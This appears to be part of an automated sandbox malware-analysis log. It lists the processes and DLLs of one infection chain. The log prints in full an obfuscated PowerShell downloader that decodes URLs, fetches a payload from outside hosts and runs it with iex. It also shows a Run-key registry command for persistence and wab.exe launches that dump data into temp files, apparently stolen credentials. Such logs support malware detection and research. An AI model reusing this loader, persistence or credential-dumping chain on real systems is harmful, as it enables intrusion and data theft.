              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: pcacli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: propsys.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
